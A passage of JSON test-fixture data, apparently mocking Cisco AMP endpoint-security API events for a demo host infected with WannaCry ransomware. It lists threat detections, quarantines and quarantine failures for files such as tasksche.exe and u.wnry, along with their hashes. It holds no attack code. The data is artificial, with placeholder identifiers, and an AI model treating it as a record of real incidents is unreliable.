pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 